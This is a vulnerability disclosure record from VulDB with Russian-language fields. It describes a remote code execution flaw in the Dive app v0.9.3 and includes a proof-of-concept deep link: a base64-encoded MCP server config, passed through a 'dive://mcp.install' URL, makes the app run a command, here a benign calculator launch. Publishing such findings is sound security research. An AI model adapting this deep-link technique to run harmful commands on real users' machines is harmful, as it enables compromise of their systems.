| Название | Dive v0.9.3 Command Injection |
|---|
| Описание | ## Summary
We found a remote code execution (RCE) in the latest version (v0.9.3) of [Dive](https://github.com/OpenAgentPlatform/Dive) triggered from a custom url in the form like `dive:`.
An attacker can exploit this vulnerability by embedding a specially crafted `dive:` URL on any website. When a victim visits such a site, the browser triggers a prompt to open the Dive app. If the victim confirms opening Dive, Dive will launch and process the URL, leading to remote code execution on the victim’s machine.
## Affected versions
<= 0.9.3 (latest)
## PoC
## Details
Dive supports installing mcp servers from config files, which can be embeded in the custum url.
Dive fist processes custom url with code:
```javascript
// https://github.com/OpenAgentPlatform/Dive/blob/e4901e9c2b0704688621ae646349af727ad85cfe/electron/main/index.ts#L49-L51
app.on("open-url", (event, url) => {
c(win, url)
})
```
The `deeplinkHandler` processes the url with:
Inside whichm when the url's host equals to "mcp.install", Dive extracts "name" and "config" parameters.
```javascript
// https://github.com/OpenAgentPlatform/Dive/blob/e4901e9c2b0704688621ae646349af727ad85cfe/electron/main/deeplink.ts#L67-L98
case "mcp.install":
const deeplink = new URL(url)
win?.webContents.send("mcp.install", {
name: deeplink.searchParams.get("name") || "",
config: deeplink.searchParams.get("config") || "",
})
```
A config is in the form like this:
```json
{
"mcpServers": {
"pwn": {
"transport": "stdio",
"enabled": true,
"command": "open",
"args": [
"-a",
"/System/Applications/Calculator.app"
],
"env": {},
"url": null,
"extraData": null,
"proxy": null,
"headers": null,
"exclude_tools": [],
"initialTimeout": 10
}
}
}
```
When the value of "transport" is "stdio", the command will execute with the args. For example, the above config will execute `open -a /System/Applications/Calculator.app`, causing the calculator to pop up.
The name value if "pwn" and the config value is:
```json
{
"transport": "stdio",
"enabled": true,
"command": "open",
"args": [
"-a",
"/System/Applications/Calculator.app"
],
"env": {},
"url": null,
"extraData": null,
"proxy": null,
"headers": null,
"exclude_tools": [],
"initialTimeout": 10
}
```
Finally, encode the config with base64, we can construct a custom url as working poc.
``` url
## Input this url in your browser and confirm opeing Dive will lead to the calculator popping up (on Mac).
dive://mcp.install/?name=pwn&config=ewogICAgICAidHJhbnNwb3J0IjogInN0ZGlvIiwKICAgICAgImVuYWJsZWQiOiB0cnVlLAogICAgICAiY29tbWFuZCI6ICJvcGVuIiwKICAgICAgImFyZ3MiOiBbCiAgICAgICAgIi1hIiwKICAgICAgICAiL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAiCiAgICAgIF0sCiAgICAgICJlbnYiOiB7fSwKICAgICAgInVybCI6IG51bGwsCiAgICAgICJleHRyYURhdGEiOiBudWxsLAogICAgICAicHJveHkiOiBudWxsLAogICAgICAiaGVhZGVycyI6IG51bGwsCiAgICAgICJleGNsdWRlX3Rvb2xzIjogW10sCiAgICAgICJpbml0aWFsVGltZW91dCI6IDEwCiAgICB9
```
## Impact
This vulnerability causes remote code execution, impacting the most up to date Dive (v0.9.3).
## Credits
Jianjia Yu (suuuuuzy), Zhengyu Liu (jackfromeast)
|
|---|
| Источник | ⚠️ https://gist.github.com/Suuuuuzy/0e281e0260d47e51ad3769f5ec8cbae3 |
|---|
| Пользователь | Jianjia Yu (UID 86953) |
|---|
| Представление | 27.08.2025 23:19 (10 месяцы назад) |
|---|
| Модерация | 02.09.2025 09:53 (5 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 322149 [OpenAgentPlatform Dive до 0.9.3 deeplink.ts эскалация привилегий] |
|---|
| Баллы | 20 |
|---|